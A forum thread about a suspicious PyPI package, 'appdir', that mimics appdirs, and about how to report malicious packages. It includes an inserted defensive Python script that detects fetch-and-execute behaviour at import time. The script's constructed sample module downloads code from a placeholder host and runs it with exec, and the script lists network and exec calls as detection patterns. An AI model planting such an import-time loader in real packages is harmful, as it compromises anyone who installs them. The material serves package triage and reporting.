Appdir package on pypi seems to be a fraudulent/mistaken re-release of appdirs

The appdir package appears to be a fraudulent or mistaken re-release of the long-existing appdirs package. It has no repository home, its release notes are a direct copy of the appdirs package, there is no info about why it was created as a duplicate, and the maintainer email address is a known pseudonym (lele@qq.com) that has had multiple fraudulent App Store releases removed from both the Apple and Google app stores.

2 Likes

I wonder if maybe it would be better to report this at one of these:

I am really not sure.


Aside:

This project seems to have taken over the functionalities of appdirs / xdgappdirs:

I reported it here because it's not an actual PyPI security issue, nor is it a PyPI bug. There is already a PyPI issue about the fact that there is no good way to report these issues :).

Thanks for the pointer to platformdirs! It has a clear statement about why it was forked from appdirs, which makes me feel much better about it.

Is there any process for the PyPI admins to contact the alleged maintainers of appdir? I don’t particularly want to be phished by them.

From what I understand, pypi-support is the correct venue for this (and that’s the place PyPI admins monitor actively, not this forum).

As for contact, I believe there's something in the TOC that says it's up to the user to provide valid contact information and PyPI has the right to remove things otherwise, or something like that. PyPI admins (I'm not one) have experience dealing with this kind of stuff and know exactly what to do, so you don't need to worry about that (unless you are the one that published the package, of course :smirk:)

I have filed an issue on pypi-support as it looks like the package tries to download and run code from a remote server when imported, which is surely malicious.

2 Likes
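For readers who want to check a suspicious package for the behaviour described in the post above (fetching and executing code at import time) before reporting it, here is a small static triage script. It is an added example, not code from the thread or from any of the packages discussed. It parses a module's source with the standard-library `ast` module, resolves import aliases, and reports calls to network-fetch and code/command-execution functions, flagging those that run at import time (module top level, outside any function body). The call lists and the sample `__init__.py` are constructed for illustration; they are not a signature set and not the contents of any real package.

```python
"""Static triage of Python source for "fetch and execute on import" behaviour.

Added example for the thread above; not code from PyPI, appdirs, platformdirs
or the reported package. The sample module below is constructed for illustration.
"""
import ast
from typing import Dict, List, Tuple

# Illustrative assumption: callables worth a second look in a package.
# Not exhaustive; obfuscated code (getattr(), base64 strings, ctypes) evades this.
NETWORK_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post", "socket.create_connection",
}
EXEC_CALLS = {
    "exec", "eval", "compile", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output", "os.system", "os.popen",
}


def _dotted_name(node: ast.AST) -> str:
    """Render a Name/Attribute chain as 'a.b.c'; '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _import_map(tree: ast.Module) -> Dict[str, str]:
    """Map local names bound by 'import ... as' / 'from ... import' to full names."""
    aliases: Dict[str, str] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _resolve(name: str, aliases: Dict[str, str]) -> str:
    head, _, rest = name.partition(".")
    head = aliases.get(head, head)
    return head + ("." + rest if rest else "")


class _Finder(ast.NodeVisitor):
    """Collect (lineno, callee, kind, runs_at_import) for suspicious calls."""

    def __init__(self, aliases: Dict[str, str]) -> None:
        self.aliases = aliases
        self.depth = 0  # > 0 while inside a function/lambda body (deferred code)
        self.hits: List[Tuple[int, str, str, bool]] = []

    def _deferred(self, node: ast.AST) -> None:
        # Simplification: decorators and default arguments also run at import
        # time, but the body of a function only runs when something calls it.
        self.depth += 1
        self.generic_visit(node)
        self.depth -= 1

    visit_FunctionDef = visit_AsyncFunctionDef = visit_Lambda = _deferred

    def visit_Call(self, node: ast.Call) -> None:
        name = _resolve(_dotted_name(node.func), self.aliases)
        if name in NETWORK_CALLS or name in EXEC_CALLS:
            kind = "network" if name in NETWORK_CALLS else "exec"
            self.hits.append((node.lineno, name, kind, self.depth == 0))
        self.generic_visit(node)


def find_suspicious_calls(source: str) -> List[Tuple[int, str, str, bool]]:
    """Return every suspicious call in the module source, in source order."""
    tree = ast.parse(source)
    finder = _Finder(_import_map(tree))
    finder.visit(tree)
    return finder.hits


def fetch_and_exec_on_import(source: str) -> bool:
    """True when a network fetch AND an exec-class call both run at import time."""
    hits = find_suspicious_calls(source)
    fetch = any(k == "network" and at_import for _, _, k, at_import in hits)
    run = any(k == "exec" and at_import for _, _, k, at_import in hits)
    return fetch and run


# Constructed sample __init__.py, modelled on the behaviour described in the
# thread; it is NOT the contents of any real package.
SAMPLE_INIT = '''\
import urllib.request as ur
from subprocess import run as sh

_payload = ur.urlopen("http://example.invalid/stage2.py").read()
exec(compile(_payload, "<remote>", "exec"))

def user_dirs():
    sh(["ls"])  # deferred: only runs if a caller invokes user_dirs()
    return []
'''

if __name__ == "__main__":
    for lineno, callee, kind, at_import in find_suspicious_calls(SAMPLE_INIT):
        when = "AT IMPORT" if at_import else "deferred"
        print(f"line {lineno}: {callee} ({kind}, {when})")
    print("fetch-and-exec on import:", fetch_and_exec_on_import(SAMPLE_INIT))
```

Run it against each `.py` file in a downloaded sdist or wheel (unpack the archive first; `setup.py` executes at install time, so treat it like import-time code). A hit is a reason to look at the file by hand, not proof of malice, and a clean result proves little: this only catches direct, unobfuscated calls.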

Thanks all for the help here. If pypi-support is the correct venue for this, then it would be great to see the PyPI help FAQ expanded to explain this, so that users like me who discover suspicious packages know to report it.

You can probably open a bug and submit a PR for that at GitHub - pypa/warehouse: The Python Package Index.

pypi-support doesn’t seem to offer a way to report malicious packages. Click on “New issue”, which option should one choose to report a malicious package? appdir was reported under PEP 541 but even if that were correct (which I do not think that it is), it would’ve been completely non-obvious.

1 Like

In general, malicious or fraudulent packages should be reported directly to admin@pypi.org and/or security@python.org.

These will result in the name simply being blocked. If you want the name for yourself, please use the process through pypi-support.

I sent an email to admin@pypi.org yesterday about these packages here. I’ve no idea if it reached anyone, and I personally don’t see a reason that malware should be reported privately.

Feel free to publicise it as well, but the important thing is that it’s reported directly.

Well, it’s not self-evident that sending an email is more direct or more effective than opening a ticket on pypi-support. I would also guess that time availability is a bigger factor than the communication medium used to reach the PyPI admins.

1 Like